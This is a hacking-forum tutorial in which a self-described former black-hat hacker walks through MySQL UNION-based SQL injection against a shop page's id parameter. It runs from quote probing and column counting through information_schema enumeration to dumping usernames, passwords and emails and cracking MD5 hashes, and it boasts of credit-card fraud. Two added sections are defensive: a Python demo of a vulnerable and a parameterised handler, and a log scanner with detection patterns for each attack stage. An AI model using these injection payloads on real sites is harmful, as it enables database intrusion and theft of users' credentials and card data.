WebSite Hacking Full [Tut]
<blockquote data-quote="Ethical_World" data-source="post: 4232572" data-attributes="member: 183013">
<p>Well, first I will introduce myself. I was a Black Hat Hacker for 3 years. I did:</p>
<p>1. About 150 sites defaced</p>
<p>2. 5 major viruses</p>
<p>3. More than 200 computers boxed</p>
<p>4. Many, many credit card frauds</p>
<p>and did many other things, so I can't reveal my real identity. But now I'm a White Hat Hacker, an Ethical Hacker if you want to call it that.</p>
<p><strong>So this tut was written by my own hand; I didn't copy it from anywhere,</strong></p>
<p><strong>because Elakiri deserves the best.</strong></p>
<p>There are a couple of ways to hack into a website:</p>
<p>1. SQL injection</p>
<p>2. RFI</p>
<p>3. LFI</p>
<p>4. XSS</p>
<p>5. Other ways</p>
<p>Well, SQL injection is the most famous one, so I will teach you about SQL with pictures!</p>
<p style="text-align: center"><u>SQL Injection</u></p>
<p><u>What is SQL Injection?</u></p>
<p>SQL injection is something like this: put very simply, when you inject a site you can get:</p>
<p>Admin user name (root)</p>
<p>Admin password (root)</p>
<p>Other admins' passwords</p>
<p>Every user name</p>
<p>Every user password</p>
<p>Credit card info (every detail)</p>
<p><u>How to find out whether a site is vulnerable or not</u></p>
<p>Let's say I have a site:</p>
<p>[code]http://www.website.com/shop.php?id=10[/code]</p>
<p>To see whether it is hackable or not, put ' at the end, so it should look like:</p>
<p>[code]http://www.website.com/shop.php?id=10'[/code]</p>
<p>And if it gives you a MySQL error, that means the site is hackable.</p>
<p><img src="http://img519.imageshack.us/img519/7947/1sqlerror.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p>OK, the next step is:</p>
<p>So now we know whether the site is vulnerable or not.</p>
<p>Now we have to get through these steps to hack into admin:</p>
<p>1. Finding the number of columns</p>
<p>2. Check if UNION works.</p>
<p>3. Looking for a visible column</p>
<p>3. Check if the version is &gt; 5</p>
<p>4. Extracting table names, column names, etc... (Or bruteforcing if the version is &lt; 5)</p>
<p>5. Forming the finishing query to extract our required information.</p>
<p><u>Finding the number of columns</u></p>
<p>[code]http://www.Site.com/shop.php?id=10+order+by+1--[/code] (You should not get any error)</p>
<p>[code]http://www.Site.com/shop.php?id=10+order+by+10000--[/code] (You should get an error)</p>
<p>If you get an error, the next step is to get the number of columns:</p>
<p>[code]http://www.Site.com/shop.php?id=10+order+by+2--<br />
http://www.Site.com/shop.php?id=10+order+by+3--<br />
http://www.Site.com/shop.php?id=10+order+by+4--<br />
http://www.Site.com/shop.php?id=10+order+by+5--<br />
http://www.Site.com/shop.php?id=10+order+by+6--<br />
http://www.Site.com/shop.php?id=10+order+by+7--[/code] &lt;--- Keep injecting until you get an error;</p>
<p>for me it's at order by 7 in my picture.</p>
<p><img src="http://img237.imageshack.us/img237/6467/cloms.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><u>Check if UNION works.</u></p>
<p>So now we know our site has <strong>6 columns</strong>, so what you should do now is put it in an order like:</p>
<p>[code]http://www.Site.com/shop.php?id=-10+Union+Select+1,2,3,4,5,6--[/code]</p>
<p><u>Looking for a visible column</u></p>
<p>Now you should see a number on the screen somewhere. For me it's <strong>2</strong> (it's highlighted).</p>
<p><img src="http://img142.imageshack.us/img142/46/3numbers.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><u>Check if the version is &gt; 5</u></p>
<p>Now we need to check if the version is &gt; 5 (<strong>VERY VERY IMPORTANT STEP</strong>).</p>
<p>For this, I pick our visible column... in this case it is 2... and we must replace it with "@@version".</p>
<p>For example:</p>
<p>[code]http://www.Site.com/shop.php?id=-10+Union+Select+1,@@version,3,4,5,6--[/code]</p>
<p>Now you will be able to see the MySQL version, like this:</p>
<p><img src="http://img15.imageshack.us/img15/7214/4version.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><strong>You should FIRST CHECK IF IT IS GREATER THAN 5, now..</strong></p>
<p><strong>If it is, you can proceed, or you HAVE TO GUESS THE TABLE NAMES IF IT'S BELOW version 5.</strong></p>
<p><u>Extracting table names, column names, etc...</u></p>
<p>Now we must get:</p>
<p>1. Database names</p>
<p>2. Table names</p>
<p>3. Column names</p>
<p><u>Database names:</u></p>
<p>Now this is the confusing part, so stay with me.</p>
<p>Now we are going to get the database name and user all together, since we know the visible column:</p>
<p>[code]http://www.Site.com/shop.php?id=-10+Union+Select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6--[/code]</p>
<p>Many people get confused by <strong>"concat_ws"</strong>. It actually means concat with separator, and the separator we use should be given at the start of the syntax. Here I used 0x3a, whose equivalent is “:”. The main purpose of using this is getting the output in the desired format, as we need it to be. (copied)</p>
<p><u>Now let's see what these are:</u></p>
<p><strong>Version() :-</strong> Version() is used to inject the version of MySQL used on the server.</p>
<p><strong>User() :-</strong> This will inject the registered MySQL user in the database.</p>
<p><strong>Database() :-</strong> is the database name.</p>
<p>Now that will give you something like this:</p>
<p><img src="http://img519.imageshack.us/img519/9126/5sigma.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><u>Grab the database using information_schema</u></p>
<p>[code]http://www.website.com/shop.php?id=1+UNION+SELECT+1, group_concat(schema_name),3,4,5,6 +from+information_schema.schemata—[/code]</p>
<p><strong><u>What is this</u></strong></p>
<p>1. <strong>+from+information_schema.schemata :-</strong> returns the databases on the server.</p>
<p>We may get the database name depending on the number of databases present.</p>
<p>Like if you get something like this:</p>
<p><img src="http://img148.imageshack.us/img148/1087/6database.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p><strong>Sigma</strong> is the database name.</p>
<p><em><u>Extracting table names:</u></em></p>
<p>Now we know the database name. What we need now is the <strong>MySQL table names</strong>.</p>
<p>I've picked the database 'users' to extract our table names.</p>
<p>We have to use the database information_schema, the table tables and the column table_name to extract the respective table names.</p>
<p>So it should be like:</p>
<p>[code]http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4 ,5,6+from+information_schema.tables—[/code]</p>
<p>This will give you more than we need, like every junk in the DB.</p>
<p>So we only need the tables for the table users. So now we go with:</p>
<p>[code]http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='users'—[/code]</p>
<p>If it doesn't respond properly, sometimes you have to hex the "Users"; when you hex "Users" you get "0x7573657273".</p>
<p>So it should be like:</p>
<p>[code]http://www.Site.com/shop.php?id=1+UNION+SELECT+1, group_concat(table_name),3,4,5,6 +from+information_schema.tables+where+table_schema='0x7573657273'—[/code]</p>
<p>Now you should get a table name. I'll take the table USERS for example.</p>
<p><strong><em>Column names:</em></strong></p>
<p>Now we are going to get the data from the table named “USERS”, and we extract various columns from it.</p>
<p>[code]www.Site.com/shop.php?id=10+UNION+SE ... olumn_name),3,4,5,6+from+information_schema.columns+where+table_name='USERS'--[/code]</p>
<p>In that I have changed group_concat(table_name) to group_concat(column_name), because now we are looking for columns.</p>
<p>column_name extracts all column names present in the table.</p>
<p>And add this to the end of the columns:</p>
<p><strong>+from+information_schema.columns+where+table_name='USERS'—</strong></p>
<p>It will show you the columns. Let's say the columns are username, password and email.</p>
<p>[code]http://www.website.com/shop.php?id=10+UNION+SELECT+1,concat_ws(0x3a,username,password,email) ,3,4+from+USERS—[/code]</p>
<p>Now you are done. Anyway, I only needed the admin user name, so I did it in another way.</p>
<p><img src="http://img99.imageshack.us/img99/6351/donee.png" alt="" class="fr-fic fr-dii fr-draggable " style="" /></p>
<p>If it comes with a number, you need to crack it. You can use an online MD5 cracker for that.</p>
<p>This is only for knowledge. I'm not responsible for what you do with the knowledge.</p>
</blockquote><p></p>
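Why the single-quote probe and the UNION step in the post above work, and what stops them, shown as an added example that is not part of the original post. It assumes a six-column `products` table with constructed data and uses Python's `sqlite3` as a stand-in for the PHP/MySQL `shop.php`; the function names are hypothetical.

```python
import sqlite3

def make_db():
    """Six-column products table (constructed data); SQLite stands in for MySQL."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price TEXT,"
        " stock TEXT, category TEXT, notes TEXT)"
    )
    db.execute("INSERT INTO products VALUES (10, 'kettle', '24.99', '7', 'kitchen', '')")
    return db

def shop_vulnerable(db, raw_id):
    """Before: the id parameter is pasted into the SQL text and errors are echoed."""
    sql = "SELECT * FROM products WHERE id = " + raw_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        # Echoing the driver error is what makes the single-quote probe informative.
        return 500, "SQL error: %s" % exc

def shop_hardened(db, raw_id):
    """After: strict validation, a bound parameter, and a generic failure page."""
    if not raw_id.isascii() or not raw_id.isdigit() or len(raw_id) > 9:
        return 400, "Bad request"
    try:
        rows = db.execute(
            "SELECT * FROM products WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, "Internal error"  # details go to the server log, not the client
    return (200, rows) if rows else (404, "Not found")

def lookup_bound_only(db, raw_id):
    """Binding alone, without validation: the value can never become SQL syntax."""
    return db.execute("SELECT * FROM products WHERE id = ?", (raw_id,)).fetchall()

# Inputs taken from the post's URLs after URL decoding ('+' becomes a space).
PROBES = ["10", "10'", "-10 Union Select 1,2,3,4,5,6--"]

def compare():
    """Run every probe through both handlers and return the paired results."""
    db = make_db()
    return [(p, shop_vulnerable(db, p), shop_hardened(db, p)) for p in PROBES]

if __name__ == "__main__":
    for probe, before, after in compare():
        print(repr(probe))
        print("  vulnerable:", before)
        print("  hardened:  ", after)
```

The bound parameter is the actual fix; the validation and the generic error page remove the feedback that each step of the post depends on.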
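The request sequence the post walks through leaves a recognisable trail in web server logs. This added example (not part of the original post) scans access-log lines for those stages and reports `ORDER BY` column-count sweeps per client; the log lines are constructed, and the rule names and the combined-log layout are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines; client addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?id=10 HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?id=10%27 HTTP/1.1" 500 310
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /shop.php?id=10+order+by+1-- HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:11 +0000] "GET /shop.php?id=10+order+by+6-- HTTP/1.1" 200 5120
198.51.100.7 - - [01/Jan/2024:10:00:12 +0000] "GET /shop.php?id=10+order+by+7-- HTTP/1.1" 500 310
198.51.100.7 - - [01/Jan/2024:10:00:20 +0000] "GET /shop.php?id=-10+Union+Select+1,@@version,3,4,5,6-- HTTP/1.1" 200 900
198.51.100.7 - - [01/Jan/2024:10:00:31 +0000] "GET /shop.php?id=1+UNION+SELECT+1,group_concat(table_name),3,4,5,6+from+information_schema.tables-- HTTP/1.1" 200 2100
203.0.113.5 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=order+by+price HTTP/1.1" 200 800
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
ORDER_BY = re.compile(r"\border\s+by\s+(\d+)", re.I)

# One rule per stage of the post; each is matched against URL-decoded parameter values.
RULES = [
    ("quote_probe", re.compile(r"^-?\d+\s*['\"]")),
    ("order_by_index", ORDER_BY),
    ("union_select", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("db_fingerprint", re.compile(r"@@version|\b(?:version|user|database)\s*\(", re.I)),
]

def parse(log_text):
    """Yield (ip, status, target, decoded parameter values) for each request line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), int(m.group(3))
        query = urlsplit(target).query
        values = [v for _, v in parse_qsl(query, keep_blank_values=True)]
        yield ip, status, target, values

def findings(log_text):
    """Return (ip, status, target, matched rule names) for every suspicious request."""
    out = []
    for ip, status, target, values in parse(log_text):
        hits = sorted({name for name, rx in RULES for v in values if rx.search(v)})
        if hits:
            out.append((ip, status, target, hits))
    return out

def order_by_sweeps(log_text, min_steps=3):
    """Clients that tried several ORDER BY indexes, and the last one that succeeded."""
    seen = defaultdict(dict)  # ip -> {index: status}
    for ip, status, _, values in parse(log_text):
        for v in values:
            m = ORDER_BY.search(v)
            if m:
                seen[ip][int(m.group(1))] = status
    report = {}
    for ip, steps in seen.items():
        if len(steps) < min_steps:
            continue
        ok = [i for i, s in steps.items() if s < 500]
        report[ip] = {"indexes": sorted(steps), "last_ok_index": max(ok) if ok else None}
    return report

if __name__ == "__main__":
    for row in findings(SAMPLE_LOG):
        print(row)
    print(order_by_sweeps(SAMPLE_LOG))
```

A 200 followed by a 500 on consecutive `ORDER BY` indexes from one client means the page leaked its column count; the `last_ok_index` field records what that client learned.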